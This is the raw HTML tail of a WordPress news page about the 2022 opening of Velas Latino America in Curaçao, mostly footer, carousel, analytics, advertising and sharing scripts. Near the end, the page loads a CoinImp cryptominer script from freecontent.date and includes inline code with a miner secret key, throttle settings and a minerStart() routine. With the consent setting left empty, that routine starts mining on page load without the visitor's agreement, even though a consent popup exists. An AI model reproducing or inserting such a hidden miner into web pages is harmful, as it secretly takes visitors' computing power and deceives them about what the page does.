<figure class="wp-block-image size-full"><img loading="lazy" width="685" height="960" src="https://kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654538711521.jpg" alt="" class="wp-image-276941" srcset="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654538711521.jpg?w=685&amp;ssl=1 685w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654538711521.jpg?resize=214%2C300&amp;ssl=1 214w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654538711521.jpg?resize=107%2C150&amp;ssl=1 107w" sizes="(max-width: 685px) 100vw, 685px" /></figure>
</aside><aside id="block-163" class="widget widget_block widget_media_image clearfix">
<figure class="wp-block-image size-full"><img loading="lazy" width="720" height="720" src="https://kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654538740382.jpg" alt="" class="wp-image-276942" srcset="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654538740382.jpg?w=720&amp;ssl=1 720w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654538740382.jpg?resize=300%2C300&amp;ssl=1 300w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654538740382.jpg?resize=150%2C150&amp;ssl=1 150w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654538740382.jpg?resize=400%2C400&amp;ssl=1 400w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654538740382.jpg?resize=200%2C200&amp;ssl=1 200w" sizes="(max-width: 720px) 100vw, 720px" /></figure>
</aside>
	</div>
		</div><!-- .inner-wrap -->
				</div><!-- #main -->
				<footer id="colophon" class="clearfix ">
				<div class="footer-socket-wrapper clearfix">
			<div class="inner-wrap">
				<div class="footer-socket-area">
		
		<div class="footer-socket-right-section">
			
		<div class="social-links clearfix">
			<ul>
				<li><a href="#" target="_blank"><i class="fa fa-facebook"></i></a></li><li><a href="#" target="_blank"><i class="fa fa-twitter"></i></a></li><li><a href="http://kikotapasando" target="_blank"><i class="fa fa-instagram"></i></a></li><li><a href="http://Kiko%20Ta%20Pasando" target="_blank"><i class="fa fa-youtube"></i></a></li>			</ul>
		</div><!-- .social-links -->
				</div>

				<div class="footer-socket-left-section">
			<div class="copyright">Copyright &copy; 2022 <a href="https://kikotapasando.com/" title="" ><span></span></a>. All rights reserved.<br>Theme: <a href="https://themegrill.com/themes/colormag" target="_blank" title="ColorMag" rel="nofollow"><span>ColorMag</span></a> by ThemeGrill. Powered by <a href="https://wordpress.com/?ref=footer_custom_powered">Powered by WordPress.com</a>.</div>		</div>
				</div><!-- .footer-socket-area -->
					</div><!-- .inner-wrap -->
		</div><!-- .footer-socket-wrapper -->
				</footer><!-- #colophon -->
				<a href="#masthead" id="scroll-up"><i class="fa fa-chevron-up"></i></a>
				</div><!-- #page -->
		<!--  -->

		
				<div id="amp-mobile-version-switcher" hidden>
			<a rel="" href="https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/amp/">
				Go to mobile version			</a>
		</div>

						<div id="jp-carousel-loading-overlay">
			<div id="jp-carousel-loading-wrapper">
				<span id="jp-carousel-library-loading">&nbsp;</span>
			</div>
		</div>
		<div class="jp-carousel-overlay" style="display: none;">

		<div class="jp-carousel-container">
			<!-- The Carousel Swiper -->
			<div
				class="jp-carousel-wrap swiper-container jp-carousel-swiper-container jp-carousel-transitions"
				itemscope
				itemtype="https://schema.org/ImageGallery">
				<div class="jp-carousel swiper-wrapper"></div>
				<div class="jp-swiper-button-prev swiper-button-prev">
					<svg width="25" height="24" viewBox="0 0 25 24" fill="none" xmlns="http://www.w3.org/2000/svg">
						<mask id="maskPrev" mask-type="alpha" maskUnits="userSpaceOnUse" x="8" y="6" width="9" height="12">
							<path d="M16.2072 16.59L11.6496 12L16.2072 7.41L14.8041 6L8.8335 12L14.8041 18L16.2072 16.59Z" fill="white"/>
						</mask>
						<g mask="url(#maskPrev)">
							<rect x="0.579102" width="23.8823" height="24" fill="#FFFFFF"/>
						</g>
					</svg>
				</div>
				<div class="jp-swiper-button-next swiper-button-next">
					<svg width="25" height="24" viewBox="0 0 25 24" fill="none" xmlns="http://www.w3.org/2000/svg">
						<mask id="maskNext" mask-type="alpha" maskUnits="userSpaceOnUse" x="8" y="6" width="8" height="12">
							<path d="M8.59814 16.59L13.1557 12L8.59814 7.41L10.0012 6L15.9718 12L10.0012 18L8.59814 16.59Z" fill="white"/>
						</mask>
						<g mask="url(#maskNext)">
							<rect x="0.34375" width="23.8822" height="24" fill="#FFFFFF"/>
						</g>
					</svg>
				</div>
			</div>
			<!-- The main close buton -->
			<div class="jp-carousel-close-hint">
				<svg width="25" height="24" viewBox="0 0 25 24" fill="none" xmlns="http://www.w3.org/2000/svg">
					<mask id="maskClose" mask-type="alpha" maskUnits="userSpaceOnUse" x="5" y="5" width="15" height="14">
						<path d="M19.3166 6.41L17.9135 5L12.3509 10.59L6.78834 5L5.38525 6.41L10.9478 12L5.38525 17.59L6.78834 19L12.3509 13.41L17.9135 19L19.3166 17.59L13.754 12L19.3166 6.41Z" fill="white"/>
					</mask>
					<g mask="url(#maskClose)">
						<rect x="0.409668" width="23.8823" height="24" fill="#FFFFFF"/>
					</g>
				</svg>
			</div>
			<!-- Image info, comments and meta -->
			<div class="jp-carousel-info">
				<div class="jp-carousel-info-footer">
					<div class="jp-carousel-pagination-container">
						<div class="jp-swiper-pagination swiper-pagination"></div>
						<div class="jp-carousel-pagination"></div>
					</div>
					<div class="jp-carousel-photo-title-container">
						<h2 class="jp-carousel-photo-caption"></h2>
					</div>
					<div class="jp-carousel-photo-icons-container">
						<a href="#" class="jp-carousel-icon-btn jp-carousel-icon-info" aria-label="Toggle photo metadata visibility">
							<span class="jp-carousel-icon">
								<svg width="25" height="24" viewBox="0 0 25 24" fill="none" xmlns="http://www.w3.org/2000/svg">
									<mask id="maskInfo" mask-type="alpha" maskUnits="userSpaceOnUse" x="2" y="2" width="21" height="20">
										<path fill-rule="evenodd" clip-rule="evenodd" d="M12.7537 2C7.26076 2 2.80273 6.48 2.80273 12C2.80273 17.52 7.26076 22 12.7537 22C18.2466 22 22.7046 17.52 22.7046 12C22.7046 6.48 18.2466 2 12.7537 2ZM11.7586 7V9H13.7488V7H11.7586ZM11.7586 11V17H13.7488V11H11.7586ZM4.79292 12C4.79292 16.41 8.36531 20 12.7537 20C17.142 20 20.7144 16.41 20.7144 12C20.7144 7.59 17.142 4 12.7537 4C8.36531 4 4.79292 7.59 4.79292 12Z" fill="white"/>
									</mask>
									<g mask="url(#maskInfo)">
										<rect x="0.8125" width="23.8823" height="24" fill="#FFFFFF"/>
									</g>
								</svg>
							</span>
						</a>
												<a href="#" class="jp-carousel-icon-btn jp-carousel-icon-comments" aria-label="Toggle photo comments visibility">
							<span class="jp-carousel-icon">
								<svg width="25" height="24" viewBox="0 0 25 24" fill="none" xmlns="http://www.w3.org/2000/svg">
									<mask id="maskComments" mask-type="alpha" maskUnits="userSpaceOnUse" x="2" y="2" width="21" height="20">
										<path fill-rule="evenodd" clip-rule="evenodd" d="M4.3271 2H20.2486C21.3432 2 22.2388 2.9 22.2388 4V16C22.2388 17.1 21.3432 18 20.2486 18H6.31729L2.33691 22V4C2.33691 2.9 3.2325 2 4.3271 2ZM6.31729 16H20.2486V4H4.3271V18L6.31729 16Z" fill="white"/>
									</mask>
									<g mask="url(#maskComments)">
										<rect x="0.34668" width="23.8823" height="24" fill="#FFFFFF"/>
									</g>
								</svg>

								<span class="jp-carousel-has-comments-indicator" aria-label="This image has comments."></span>
							</span>
						</a>
											</div>
				</div>
				<div class="jp-carousel-info-extra">
					<div class="jp-carousel-info-content-wrapper">
						<div class="jp-carousel-photo-title-container">
							<h2 class="jp-carousel-photo-title"></h2>
						</div>
						<div class="jp-carousel-comments-wrapper">
															<div id="jp-carousel-comments-loading">
									<span>Loading Comments...</span>
								</div>
								<div class="jp-carousel-comments"></div>
								<div id="jp-carousel-comment-form-container">
									<span id="jp-carousel-comment-form-spinner">&nbsp;</span>
									<div id="jp-carousel-comment-post-results"></div>
																														<div id="jp-carousel-comment-form-commenting-as">
												<p id="jp-carousel-commenting-as">
													You must be <a href="#" class="jp-carousel-comment-login">logged in</a> to post a comment.												</p>
											</div>
																											</div>
													</div>
						<div class="jp-carousel-image-meta">
							<div class="jp-carousel-title-and-caption">
								<div class="jp-carousel-photo-info">
									<h3 class="jp-carousel-caption" itemprop="caption description"></h3>
								</div>

								<div class="jp-carousel-photo-description"></div>
							</div>
							<ul class="jp-carousel-image-exif" style="display: none;"></ul>
							<a class="jp-carousel-image-download" target="_blank" style="display: none;">
								<svg width="25" height="24" viewBox="0 0 25 24" fill="none" xmlns="http://www.w3.org/2000/svg">
									<mask id="mask0" mask-type="alpha" maskUnits="userSpaceOnUse" x="3" y="3" width="19" height="18">
										<path fill-rule="evenodd" clip-rule="evenodd" d="M5.84615 5V19H19.7775V12H21.7677V19C21.7677 20.1 20.8721 21 19.7775 21H5.84615C4.74159 21 3.85596 20.1 3.85596 19V5C3.85596 3.9 4.74159 3 5.84615 3H12.8118V5H5.84615ZM14.802 5V3H21.7677V10H19.7775V6.41L9.99569 16.24L8.59261 14.83L18.3744 5H14.802Z" fill="white"/>
									</mask>
									<g mask="url(#mask0)">
										<rect x="0.870605" width="23.8823" height="24" fill="#FFFFFF"/>
									</g>
								</svg>
								<span class="jp-carousel-download-text"></span>
							</a>
							<div class="jp-carousel-image-map" style="display: none;"></div>
						</div>
					</div>
				</div>
			</div>
		</div>

		</div>
		
	
							<div id="fb-root"></div>
			
			
						
								
				
						
			<link rel='stylesheet' id='all-css-3c7d55951575a74c216de1fbb406a43b' href='https://kikotapasando.com/_static/??-eJydjMEOQDAQRH9IbVDiIr6F2khpt023TePvkXByc5vMvDfZC+UoIkXwJq2aGJTTJKwmDACKGTgeBssrFfkLbxj9pHawbkkGL3kKLjEa4Kw9BjEnWn7YzyDe4j4Y7VB1rZR11/T1CZ8wRS8=' type='text/css' media='all' />








	<iframe src='https://widgets.wp.com/likes/master.html?ver=202223#ver=202223' scrolling='no' id='likes-master' name='likes-master' style='display:none;'></iframe>
	<div id='likes-other-gravatars'><div class="likes-text"><span>%d</span> bloggers like this:</div><ul class="wpl-avatars sd-like-gravatars"></ul></div>
	<div id="popwrap" class="popwrap" style="display: none; position: fixed; top: 30%; left: 30%; right: 30%;">
					<div id="userconsent" class="overlay">
						<div class="popup">
							<h2>Would Like To Use Your Computing Power</h2>
							<a class="close" href="#" onclick="cm_togglePopUp()">&times;</a>
							<div class="content">
								You can support  by allowing them to use your processor for calculations. The calculations are securely executed in your Browser.
							</div>
							<div class="pop-buttons">
								<button class="button" onclick="cm_allowMineFunction(true)">Allow</button>
								<button class="button" onclick="cm_allowMineFunction(false)">Not Now</button>
							</div>
						</div>
					</div>
				</div>		<div id="atatags-542965382-62a0a162051a4"></div>
					
		
		<!--[if IE]>
		<script data-jetpack-boost="ignore" type="text/javascript">
			if ( 0 === window.location.hash.indexOf( '#comment-' ) ) {
				// window.location.reload() doesn't respect the Hash in IE
				window.location.hash = window.location.hash;
			}
		</script>
		<![endif]-->
		

		


<script type="text/javascript">
!function(){var e={};e.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window)return window}}(),function(n){let{ampUrl:t,isCustomizePreview:r,isAmpDevMode:o,noampQueryVarName:s,noampQueryVarValue:i,disabledStorageKey:a,mobileUserAgents:c,regexRegex:u}=n;if("undefined"==typeof sessionStorage)return;const d=new RegExp(u);if(!c.some((e=>{const n=e.match(d);return!(!n||!new RegExp(n[1],n[2]).test(navigator.userAgent))||navigator.userAgent.includes(e)})))return;e.g.addEventListener("DOMContentLoaded",(()=>{const e=document.getElementById("amp-mobile-version-switcher");if(!e)return;e.hidden=!1;const n=e.querySelector("a[href]");n&&n.addEventListener("click",(()=>{sessionStorage.removeItem(a)}))}));const g=o&&["paired-browsing-non-amp","paired-browsing-amp"].includes(window.name);if(sessionStorage.getItem(a)||r||g)return;const m=new URL(location.href),h=new URL(t);h.hash=m.hash,m.searchParams.has(s)&&i===m.searchParams.get(s)?sessionStorage.setItem(a,"1"):h.href!==m.href&&(window.stop(),location.replace(h.href))}({"ampUrl":"https:\/\/kikotapasando.com\/2022\/06\/08\/apertura-ofisial-velas-latino-america-curacao-2022\/amp\/","noampQueryVarName":"noamp","noampQueryVarValue":"mobile","disabledStorageKey":"amp_mobile_redirect_disabled","mobileUserAgents":["Mobile","Android","Silk\/","Kindle","BlackBerry","Opera Mini","Opera Mobi"],"regexRegex":"^\\/((?:.|\n)+)\\/([i]*)$","isCustomizePreview":false,"isAmpDevMode":false})}();
</script><script type="text/javascript">
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/kikotapasando.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.0"}};
/*! This file is auto-generated */
!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode,e=(p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0),i.toDataURL());return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p||!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([129777,127995,8205,129778,127999],[129777,127995,8203,129778,127999])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(e=t.source||{}).concatemoji?c(e.concatemoji):e.wpemoji&&e.twemoji&&(c(e.twemoji),c(e.wpemoji)))}(window,document,window._wpemojiSettings);
</script><script id='jetpack_related-posts-js-extra'>
var related_posts_js_options = {"post_heading":"h4"};
</script><script id='iw-no-right-click-js-extra'>
var IwNRCargs = {"rightclick":"Y","draganddrop":"Y"};
</script><script type='text/javascript'  src='https://kikotapasando.com/_static/??wp-content/plugins/jetpack/_inc/build/related-posts/related-posts.min.js,wp-content/plugins/image-watermark/js/no-right-click.js?m=1645709247'></script><script id='cmAmazingScript-js-extra'>
var cm_miner_ajax = {"ajax_url":"https:\/\/kikotapasando.com\/wp-admin\/admin-ajax.php","ajax_nonce":"c555cc1985"};
</script><script type='text/javascript'  src='https://kikotapasando.com/_static/??-eJx9j9EKwjAMRX/IrDi34Yv4LaWGNaNNa5Nt+PfWoXsQFAKBy+HkZs1A7MJ8QzFTnfuM5fFeEGksVrGJxM0khzWDS6zIanKYR2Ix4m1ByEkUEsPqrYrN2ezKT7JxPxw1UgxYT0V4ccTjVkW+ePUYq9KlkEq0G+M1hl48LX8qukRcP2EsZtde4+U49F3XDqdz+wSe2GD/'></script><script src='https://www.googletagmanager.com/gtag/js?id=UA-83616463-1' id='google_gtagjs-js' async></script><script id='google_gtagjs-js-after'>
window.dataLayer = window.dataLayer || [];function gtag(){dataLayer.push(arguments);}
gtag('set', 'linker', {"domains":["kikotapasando.com"]} );
gtag("js", new Date());
gtag("set", "developer_id.dZTNiMT", true);
gtag("config", "UA-83616463-1", {"anonymize_ip":true});
gtag("config", "G-DWTXLF1Z2J");
</script><script>
			(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
			(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
			m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
			})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
			ga('create', 'G-DWTXLF1Z2J', 'auto');
			ga('require', 'displayfeatures');
			ga('require', 'linkid');
			ga('set', 'anonymizeIp', true);
			ga('set', 'forceSSL', true);
			ga('send', 'pageview');
		</script><script>
				document.documentElement.classList.add(
					'jetpack-lazy-images-js-enabled'
				);
			</script><script async="async" src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-5639114718427035" crossorigin="anonymous" type="text/javascript"></script><script type="text/javascript">
			var __ATA_PP = { pt: 1, ht: 1, tn: 'colormag', uloggedin: 0, amp: false, siteid: 54296538, consent: 0, ad: { label: { text: 'Advertisements' }, reportAd: { text: 'Report this ad' } } };
			var __ATA = __ATA || {};
			__ATA.cmd = __ATA.cmd || [];
			__ATA.criteo = __ATA.criteo || {};
			__ATA.criteo.cmd = __ATA.criteo.cmd || [];
		</script><script type="text/javascript">
		(function(){var g=Date.now||function(){return+new Date};function h(a,b){a:{for(var c=a.length,d="string"==typeof a?a.split(""):a,e=0;e<c;e++)if(e in d&&b.call(void 0,d[e],e,a)){b=e;break a}b=-1}return 0>b?null:"string"==typeof a?a.charAt(b):a[b]};function k(a,b,c){c=null!=c?"="+encodeURIComponent(String(c)):"";if(b+=c){c=a.indexOf("#");0>c&&(c=a.length);var d=a.indexOf("?");if(0>d||d>c){d=c;var e=""}else e=a.substring(d+1,c);a=[a.substr(0,d),e,a.substr(c)];c=a[1];a[1]=b?c?c+"&"+b:b:c;a=a[0]+(a[1]?"?"+a[1]:"")+a[2]}return a};var l=0;function m(a,b){var c=document.createElement("script");c.src=a;c.onload=function(){b&&b(void 0)};c.onerror=function(){b&&b("error")};a=document.getElementsByTagName("head");var d;a&&0!==a.length?d=a[0]:d=document.documentElement;d.appendChild(c)}function n(a){var b=void 0===b?document.cookie:b;return(b=h(b.split("; "),function(c){return-1!=c.indexOf(a+"=")}))?b.split("=")[1]:""}function p(a){return"string"==typeof a&&0<a.length}
		function r(a,b,c){b=void 0===b?"":b;c=void 0===c?".":c;var d=[];Object.keys(a).forEach(function(e){var f=a[e],q=typeof f;"object"==q&&null!=f||"function"==q?d.push(r(f,b+e+c)):null!==f&&void 0!==f&&(e=encodeURIComponent(b+e),d.push(e+"="+encodeURIComponent(f)))});return d.filter(p).join("&")}function t(a,b){a||((window.__ATA||{}).config=b.c,m(b.url))}var u=Math.floor(1E13*Math.random()),v=window.__ATA||{};window.__ATA=v;window.__ATA.cmd=v.cmd||[];v.rid=u;v.createdAt=g();var w=window.__ATA||{},x="s.pubmine.com";
		w&&w.serverDomain&&(x=w.serverDomain);var y="//"+x+"/conf",z=window.top===window,A=window.__ATA_PP&&window.__ATA_PP.gdpr_applies,B="boolean"===typeof A?Number(A):null,C=window.__ATA_PP||null,D=z?document.referrer?document.referrer:null:null,E=z?window.location.href:document.referrer?document.referrer:null,F,G=n("__ATA_tuuid");F=G?G:null;var H=window.innerWidth+"x"+window.innerHeight,I=n("usprivacy"),J=r({gdpr:B,pp:C,rid:u,src:D,ref:E,tuuid:F,vp:H,us_privacy:I?I:null},"",".");
		(function(a){var b=void 0===b?"cb":b;l++;var c="callback__"+g().toString(36)+"_"+l.toString(36);a=k(a,b,c);window[c]=function(d){t(void 0,d)};m(a,function(d){d&&t(d)})})(y+"?"+J);}).call(this);
		</script><script>
			__ATA.cmd.push(function() {
				__ATA.initDynamicSlot({
					id: 'atatags-542965381-62a0a161df694',
					location: 120,
					formFactor: '001',
					label: {
						text: 'Advertisements',
					},
					creative: {
						reportAd: {
							text: 'Report this ad',
						},
						privacySettings: {
							text: 'Privacy settings',
						}
					}
				});
			});
		</script><script defer id='bilmur' data-provider='wordpress.com' data-service='atomic'  src='https://s0.wp.com/wp-content/js/bilmur.min.js?m=202223'></script><script>window.addEventListener( 'load', function() {
				document.querySelectorAll( 'link' ).forEach( function( e ) {'not all' === e.media && e.dataset.media && ( e.media = e.dataset.media, delete e.dataset.media );} );
				var e = document.getElementById( 'jetpack-boost-critical-css' );
				e && ( e.media = 'not all' );
			} );</script><script type="text/javascript">
		window.WPCOM_sharing_counts = {"https:\/\/kikotapasando.com\/2022\/06\/08\/apertura-ofisial-velas-latino-america-curacao-2022\/":277465};
	</script><script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = 'https://connect.facebook.net/en_US/sdk.js#xfbml=1&amp;appId=249643311490&version=v2.3'; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script><script>
			document.body.addEventListener( 'is.post-load', function() {
				if ( 'undefined' !== typeof FB ) {
					FB.XFBML.parse();
				}
			} );
			</script><script id="tumblr-js" type="text/javascript" src="https://assets.tumblr.com/share-button.js"></script><script type="text/javascript">
				( function () {
					// Pinterest shared resources
					var s = document.createElement( 'script' );
					s.type = 'text/javascript';
					s.async = true;
					s.setAttribute( 'data-pin-hover', true );					s.src = window.location.protocol + '//assets.pinterest.com/js/pinit.js';
					var x = document.getElementsByTagName( 'script' )[ 0 ];
					x.parentNode.insertBefore(s, x);
					// if 'Pin it' button has 'counts' make container wider
					function init() {
						var shares = document.querySelectorAll( 'li.share-pinterest' );
						for ( var i = 0; i < shares.length; i++ ) {
							var share = shares[ i ];
							if ( share.querySelector( 'a span:visible' ) ) {
								share.style.width = '80px';
							}
						}
					}

					if ( document.readyState !== 'complete' ) {
						document.addEventListener( 'load', init );
					} else {
						init();
					}
				} )();
			</script><script>
		( function () {
			var currentScript = document.currentScript;

			// Don't use Pocket's default JS as it we need to force init new Pocket share buttons loaded via JS.
			function jetpack_sharing_pocket_init() {
				var script = document.createElement( 'script' );
				var prev = currentScript || document.getElementsByTagName( 'script' )[ 0 ];
				script.setAttribute( 'async', true );
				script.setAttribute( 'src', 'https://widgets.getpocket.com/v1/j/btn.js?v=1' );
				prev.parentNode.insertBefore( script, prev );
			}

			if ( document.readyState === 'loading' ) {
				document.addEventListener( 'DOMContentLoaded', jetpack_sharing_pocket_init );
			} else {
				jetpack_sharing_pocket_init();
			}
			document.body.addEventListener( 'is.post-load', jetpack_sharing_pocket_init );
		} )();
		</script><script>
				(function(r, d, s) {
					r.loadSkypeWebSdkAsync = r.loadSkypeWebSdkAsync || function(p) {
							var js, sjs = d.getElementsByTagName(s)[0];
							if (d.getElementById(p.id)) { return; }
							js = d.createElement(s);
							js.id = p.id;
							js.src = p.scriptToLoad;
							js.onload = p.callback
							sjs.parentNode.insertBefore(js, sjs);
						};
					var p = {
						scriptToLoad: 'https://swx.cdn.skype.com/shared/v/latest/skypewebsdk.js',
						id: 'skype_web_sdk'
					};
					r.loadSkypeWebSdkAsync(p);
				})(window, document, 'script');
			</script><script id='jetpack-lazy-images-js-extra'>
var jetpackLazyImagesL10n = {"loading_warning":"Images are still loading. Please cancel your print and try again."};
</script><script type='text/javascript'  src='https://kikotapasando.com/_static/??-eJytkstOwzAQRX8IxwXRig3iJ9hXjj1JJvELP5KGr2cCcZUiBFmwGnt8z7V1PZNn0tkENnGvc4s28h6SF3LgZ7SS1xm14r5zydm1VAZt1ce7yTNS6KyAmMilM4ZsWACv542m2KcODCwy7YIR7YL0bxnCXNWXqFFB2AfFhHKYC/u120damCJb9BAKvrRePzv7LKhYbFAy73z2xeW2u/MxYsRWJLzJ8xd9g2lEdc1s3e6MbEDPNNqBNU7myBq87APLmhGVnPkB+j40az2PYJULXGTCRKLQywnT4n1mSKZ0l8KYOJJTiCCXLJirI4SRvuPfr9k0/jDfDL7GgXiKPEMnrNLXOXkxz/en48PhcHo6Pn4A3tc/yg=='></script><script src='https://www.freecontent.date./LkBx.js?ver=6.0' id='cmCoinImpMiner-js'></script><script id='jetpack-carousel-js-extra'>
var jetpackSwiperLibraryPath = {"url":"https:\/\/kikotapasando.com\/wp-content\/plugins\/jetpack\/_inc\/build\/carousel\/swiper-bundle.min.js"};
var jetpackCarouselStrings = {"widths":[370,700,1000,1200,1400,2000],"is_logged_in":"","lang":"en","ajaxurl":"https:\/\/kikotapasando.com\/wp-admin\/admin-ajax.php","nonce":"52066fe6e7","display_exif":"1","display_comments":"1","single_image_gallery":"1","single_image_gallery_media_file":"","background_color":"black","comment":"Comment","post_comment":"Post Comment","write_comment":"Write a Comment...","loading_comments":"Loading Comments...","download_original":"View full size <span class=\"photo-size\">{0}<span class=\"photo-size-times\">\u00d7<\/span>{1}<\/span>","no_comment_text":"Please be sure to submit some text with your comment.","no_comment_email":"Please provide an email address to comment.","no_comment_author":"Please provide your name to comment.","comment_post_error":"Sorry, but there was an error posting your comment. Please try again later.","comment_approved":"Your comment was approved.","comment_unapproved":"Your comment is in moderation.","camera":"Camera","aperture":"Aperture","shutter_speed":"Shutter Speed","focal_length":"Focal Length","copyright":"Copyright","comment_registration":"1","require_name_email":"1","login_url":"https:\/\/kikotapasando.com\/wp-login.php?redirect_to=https%3A%2F%2Fkikotapasando.com%2F2022%2F06%2F08%2Fapertura-ofisial-velas-latino-america-curacao-2022%2F","blog_id":"1","meta_data":["camera","aperture","shutter_speed","focal_length","copyright"]};
</script><script type='text/javascript'  src='https://kikotapasando.com/wp-content/plugins/jetpack/_inc/build/carousel/jetpack-carousel.min.js?m=1638896208'></script><script id='sharing-js-js-extra'>
var sharing_js_options = {"lang":"en","counts":"1","is_stats_active":"1"};
</script><script src='https://kikotapasando.com/wp-content/plugins/jetpack/_inc/build/sharedaddy/sharing.min.js?ver=11.0-beta' id='sharing-js-js'></script><script id='sharing-js-js-after'>
var windowOpen;
			( function () {
				function matches( el, sel ) {
					return !! (
						el.matches && el.matches( sel ) ||
						el.msMatchesSelector && el.msMatchesSelector( sel )
					);
				}

				document.body.addEventListener( 'click', function ( event ) {
					if ( ! event.target ) {
						return;
					}

					var el;
					if ( matches( event.target, 'a.share-facebook' ) ) {
						el = event.target;
					} else if ( event.target.parentNode && matches( event.target.parentNode, 'a.share-facebook' ) ) {
						el = event.target.parentNode;
					}

					if ( el ) {
						event.preventDefault();

						// If there's another sharing window open, close it.
						if ( typeof windowOpen !== 'undefined' ) {
							windowOpen.close();
						}
						windowOpen = window.open( el.getAttribute( 'href' ), 'wpcomfacebook', 'menubar=1,resizable=1,width=600,height=400' );
						return false;
					}
				} );
			} )();
var windowOpen;
			( function () {
				function matches( el, sel ) {
					return !! (
						el.matches && el.matches( sel ) ||
						el.msMatchesSelector && el.msMatchesSelector( sel )
					);
				}

				document.body.addEventListener( 'click', function ( event ) {
					if ( ! event.target ) {
						return;
					}

					var el;
					if ( matches( event.target, 'a.share-telegram' ) ) {
						el = event.target;
					} else if ( event.target.parentNode && matches( event.target.parentNode, 'a.share-telegram' ) ) {
						el = event.target.parentNode;
					}

					if ( el ) {
						event.preventDefault();

						// If there's another sharing window open, close it.
						if ( typeof windowOpen !== 'undefined' ) {
							windowOpen.close();
						}
						windowOpen = window.open( el.getAttribute( 'href' ), 'wpcomtelegram', 'menubar=1,resizable=1,width=450,height=450' );
						return false;
					}
				} );
			} )();
</script><script type="text/javascript" defer>
			var mobileStatus = "false";
			var ciSecretKey = "&#039;7079d1e47874021928455a4a2c610d71286e1857ca1064102d6b27ff759099bb&#039;";
			var ciUserConcent = "";			
			var ciMinerSpeed = "0.3";
			var ciDelayedMinerSpeed = "0.2";
			var ciDelayedMinerTime = "10";
			var ciUserip = "35.173.238.138";
			var username = "unknown";
			window.onload = function() {
				if (cm_getCookie("optIn") == "yes" || ciUserConcent != "on"){
					minerStart();
					// console.log(ciUserConcent);
				}
				else{
					if (cm_getCookie("optIn") == "no")
					{
					// console.log("pop");
					}
					else{
						cm_togglePopUp();
					}
				}
			}				
			function minerStart(){
				var miner = new Client.Anonymous(ciSecretKey, { throttle: ciMinerSpeed});
				if (miner.isMobile() && mobileStatus == false) {
					// do nothing
				}
				else{
					if (ciUserConcent == "on" && cm_getCookie("optIn") == "no"){
						// do nothing
					}
					else{
						miner.start();
						if (ciDelayedMinerTime > 0 && ciDelayedMinerSpeed > 0){
							ciDelayedMinerTime = ciDelayedMinerTime * 60000;
							setTimeout(function(){cm_delayedMiner(miner, ciDelayedMinerSpeed)}, ciDelayedMinerTime);
						}
						window.addEventListener("beforeunload", function (e) {
							console.log("beforeunload?");
							cm_sendHash(miner, ciUserip, username, "coinimp");
						});
					}
				}
			}
			</script><script type="text/javascript">
			var adNode       = document.getElementById( 'atatags-542965382-62a0a162051a4' );
			var selector     = "body > :first-child";
			var relocateNode = document.querySelector( selector );
			relocateNode.parentNode.insertBefore( adNode, relocateNode );
			</script><script>
			__ATA.cmd.push(function() {
				__ATA.initDynamicSlot({
					id: 'atatags-542965382-62a0a162051a4',
					location: 110,
					formFactor: '002',
					label: {
						text: 'Advertisements',
					},
					creative: {
						reportAd: {
							text: 'Report this ad',
						},
						privacySettings: {
							text: 'Privacy settings',
						}
					}
				});
			});
		</script><script type="text/javascript">
